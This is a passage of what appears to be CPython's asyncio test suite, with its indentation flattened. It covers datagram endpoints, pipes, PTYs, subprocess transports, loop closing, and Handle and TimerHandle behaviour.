s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms, the selector
        # may sleep a little bit less than the timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
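# SubprocessTestsMixin below is combined with EventLoopTestsMixin in the concrete
# per-selector test classes defined further down (Select/Proactor on Windows,
# Kqueue/EPoll/Poll/Select on POSIX), so the subprocess tests run against each
# event loop implementation that supports them.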
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        with self.assertWarns(DeprecationWarning):
            _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
